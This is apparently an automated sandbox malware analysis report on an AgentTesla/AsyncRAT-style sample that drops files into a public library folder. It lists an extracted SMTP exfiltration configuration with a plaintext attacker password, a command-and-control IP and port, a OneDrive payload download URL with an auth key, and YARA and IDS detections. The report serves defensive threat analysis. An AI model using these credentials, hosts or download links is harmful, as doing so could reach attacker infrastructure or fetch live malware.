"XUTz466BGLmG3TcX/C8jLjM1YgeZtXHkWl5foU/hXe7DRq1mTfSGh9lFLUrju0GdFDv9ryfbNyDz7IrKjDX7ScKOSitrpHbj9cFexQC5zpemX62SxcgOCfQTEXAv4IjoEtCjto+taoDkmbmFUivmpW91DUQm06Wnsdzy4luVJT4QCtxSlhL6sVo0Ch0Z0lz+RBUOn7ibniGGu8rKfkE8V/0dlpwM2ZObh5F0n3n+nZ8Q/nVrmGtMs7DoSYe2Co2X4Co4vfZZE4AjUOZYxZI8rFhuSTX213lrUigfM9uWMzcQoD8KRUruTLZJxw/9DLapRe28CSM1RFUOvLk6fsOTVbfoC2Ucb+5uHfuXBIMO9smcWvxw0aG2Qda8Ev/nPx9FCdctcdYZQtamjTBQU2YYIicPPZGtClXcVgL9WLqWNqmKN3shlf8VXfjajEdF3F6QYZp4HIi20jQVsDNXHfvNwPD7Z25d1jBTF39h3UlbX2Mgorb+Eoxrlpq1jokANTzr3BugvCvrjicUSru5nMRUGorVDNkcHE+SOQR/se51eCw+6ebD6MzqzSPjHqc5x4ci5hKwRsw8LjUZyGJxrNybkZ+PgHwsSIo/md1+YeVjsSc8y527gn4wRJ1t+2Crnr0bPth03HwMCa1KMRFRT6eWaqy6e3h2PXRGQ+K2ASFuUWU="}
Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Akaelkov.PIF	ReversingLabs: Detection: 26%
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: PCMNil7wkU.exe

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 4.2.vokleakA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 7.2.vokleakA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\vokleakA.pif	Unpacked PE file: 9.2.vokleakA.pif.400000.0.unpack

Source: PCMNil7wkU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49718 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr
Source:	Binary string: easinvoker.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source:	Binary string: _.pdb source: vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2155090535.00000000243C6000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218197846.000000002439D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280708634.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280042315.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2318435848.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279905778.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2281099206.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279726385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280484770.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2247149385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280249711.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_04105C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_04105C18

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 139.84.229.159:2017 -> 192.168.2.5:49707
Source: Traffic	Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 139.84.229.159:2017 -> 192.168.2.5:49707

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PCMNil7wkU.exe

Code function: 0_2_0415BB38 InternetCheckConnectionA,

0_2_0415BB38

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 139.84.229.159:2017

Source: Joe Sandbox View

IP Address: 150.171.43.11 150.171.43.11

Source: Joe Sandbox View

ASN Name: LASALLEUS LASALLEUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159
Source: unknown	TCP traffic detected without corresponding DNS query: 139.84.229.159

Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.verisign.
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/D
Source: vokleakA.pif, 00000004.00000003.2070342833.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2635294332.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2489022393.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070217424.000000003454F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3203036106.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3191396474.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2222921402.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2913394854.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2785648387.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070269486.0000000034589000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2350036517.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3235072816.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2071896130.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3064045046.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2211215720.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2925094021.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2361909846.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2774268499.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2647081701.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vokleakA.pif, 00000004.00000003.2070342833.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070217424.000000003454F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2069932196.00000000345C2000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070269486.0000000034589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?491765ff7047f
Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabns
